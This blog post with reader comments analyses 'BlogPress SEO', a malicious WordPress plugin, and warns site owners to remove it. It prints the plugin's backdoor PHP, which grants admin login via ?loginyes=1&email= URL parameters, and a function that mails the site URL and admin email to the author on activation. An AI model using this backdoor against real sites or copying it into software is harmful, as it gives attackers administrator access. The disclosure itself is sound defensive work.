BlogPress SEO is Malware

As with most scamming attempts, it all started with an email—which I ignored when I received it on Wednesday. It made claims of terrific SEO improvements using backlinks—yeah right. I do not use SEO enhancement plugins (other than Google XML sitemaps), and never plan on doing so. Anyways, the sender’s name as Saurabh, and his message was as follows:

Hello, My name is Saurabh, and I am here to offer you a unique wordpress plugin which will get you 100′s of backlinks like crazy. The plugin is 100% free and I can also offer installation help. http://BlogPressSEO.com Why backlinks are important for getting traffic. http://BlogPressSEO.com/#1 This is how the plugin works http://BlogPressSEO.com/#2 Thanks


Well, even though I was not going to install the plugin, the engineer in me wanted to investigate the code. So, I downloaded it, and did not like what I saw. Not only are there malicious components, there are several stylistic issues, and the plugin author did not follow some of the WordPress plugin best practices. A short list of stylistic issues:

  • Did not use a unique prefix to functions to work avoid function name collisions. Function names such as: fun_serverpath, SureRemoveDir, fun_create_menu_wplink wplink_activate, cleansee, etc. While is looks like fun_ is the unique prefix the author is using, fun is too common of a word for a prefix and is used to denote a quantity is a function in some programming styles. Plus there is a ton of inconsistency between function names.
  • Saves it’s settings across several options entries. While this is no longer a great performance issue, thanks to autoloading, it still clutters the wp_options table and does slow down every page load by a little bit. At least the author seems to use hwe_ as the option prefix for most of the options it creates, too bad this was not done for the functions.
  • Performs manual sql queries, not using the $wpdb object.

Analysis of the code is a little frightening. Look at this block of code:

	//if loginyes and emial then login
if($loginyes==1  && $email==get_option('admin_email'))
{
	global $wpdb;
	$tabname=$wpdb->prefix."users";
	$find_admin_sql="select * from $tabname where user_login='admin'";
	$find_sql=mysql_query($find_admin_sql);
	$user_numrow=mysql_num_rows($find_sql);
	if($user_numrow!=0)
	{
		$user_login='admin';			
	}
	if($user_numrow==0)
	{
		$find_ana_admin_sql="select * from $tabname";
		$find_sql_res=mysql_query($find_ana_admin_sql);
		while($row_find=mysql_fetch_array($find_sql_res))
		{
			$userid=$row_find['ID'];
			$user_login_find=$row_find['user_login'];
			$level=get_usermeta( $userid,'wp_user_level'); 
			if($level==10)
			{
				$user_login=$user_login_find;
				break;
			}
		}
	}		
	$user=new WP_User(0, $user_login); 
	$user_pass = md5($user->user_pass);		 
	wp_login($user_login, $user_pass, true);		 
	wp_setcookie($user_login, $user_pass, true);         
	wp_set_current_user($user_id, $user_login);
	$radirect=get_option('home')."/wp-admin";	
	echo "<script language='javascript'>";
	echo "location.replace('$radirect')";
	echo "</script>";
}

Well, looks like a backdoor, right? Knowing that $loginyes and $email are set using get superglobals is even more worrying. Just append ?loginyes=1&email= to any url on a site running this script will get you in, all you need to know is the email address of the admin. Now, who would have that information?

function email_send_fun()
{
	$headers="From:".get_option('admin_email')."\n";
	$headers.="Reply-to:".get_option('admin_email')."\n";
	$sub="BlogPressSeo new installation.";
	$mes=get_option('siteurl');
	$to="info@blogpressseo.com";	
	mail($to,$sub,$mes,$headers);
	$hwe_blogidd=get_option("hwe_blogid");
	
	update_option("hwe_saveradio_option",3);
	update_option("hwe_linkplacement",3);
	
	if($hwe_blogidd)
	{
		wplink_activate();
	}
}

Oh, right, that would be whoever reads info@blogpressseo.com. This is the malicious function Joost de Valk found and reported in his post BlogPress SEO Plugin: Spam!. This function runs every time the plugin is activated.

If you have installed this plugin, delete it immediately. Then, change your admin email address (under Settings > General, look for the option E-mail address). You’ll have to manually clean up your wp_options table as the author did not provide an uninstall method.

Update: You may want to read the next post on this topic, “BlogPress SEO Aftermath“.

-John Havlik

[end of transmission, stay tuned]

Trackbacks/Pingbacks

  1. Pingback: BlogPress SEO is Malware | mtekk's Crib | Creative Web Publishing | Scoop.it

  2. Pingback: BlogPress SEO is Malware | mtekk's Crib | Creative Publishing (Not about Writing or Marketing) | Scoop.it

77 thoughts on “BlogPress SEO is Malware

  1. I agree with Nik – There are no short cuts!

    I’m glad this information was put posted and spread quickly. I’ll be informing my whole network to look out for this plug in and take a look at the ones they have.

    Things like this make it mandatory to change your password frequently. No amount of security is too much for a website in my opinion.

  2. Why not send the guy an email? We could ask him to stop, maybe spam him, maybe register his email account on as many spam sites as possible. After all we have the email account:
    info@blogpressseo.com
    We know he uses that account for at least one purpose and he probably checks it quite often. I say we teach him a lesson.

    • Hey now, we can’t condone the participation in any vigilante justice, especially if it qualifies as harassment. Even though the guy is malicious, and he is not from the United States… ;)

      -John Havlik

  3. The world of open source should not be corrupted by people like this. Thank you for this post with clear details. The first part could have been a genuine mistake but not the second one.

  4. I think the real problem is that Open Source is exploding. The security vulernabilities which are deliberately or un-intentionally written into software is the real problem if you ask me.

    You only need one piece of popular software with an exploit or a “backdoor” and then millions of websites are compromised.

    I just don’t see it working as well as it should be in some communities.

    • In other words. If it’s not backed by a real brand name, and they have no means to support what it is you are taking from them. Then you immediately have to second guess the real intention of the software.

      • james: I think the real problem is that Open Source is exploding. The security vulernabilities which are deliberately or un-intentionally written into software is the real problem if you ask me.

        I really do not see how this is a Open Source problem exactly. All software has security vulnerabilities, and always will as long as a human is involved.

        The fact that BlogPress SEO was readily available (e.g. it was free to download), allowed me to look at the source and find the backdoor. There really is nothing WordPress itself can do, other than lockdown the API and sandbox plugins, to prevent things like this. It ultimately comes down to the user, and the need for security education.

        -John Havlik

    • There is no way to really ban them, especially when they are not in the WordPress.org plugin repository. The only thing we can do is find these bad plugins early, and warn people know about them.

      -John Havlik

    • Oh, I didn’t initially run into the backdoor, it was after I began writing (and said WTF? a few too many times) that I found the backdoor. There is much more crappieness in their code that I did not cover as I found the backdoor and was more interested in it than the code quality (for obvious reasons).

      -John Havlik

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>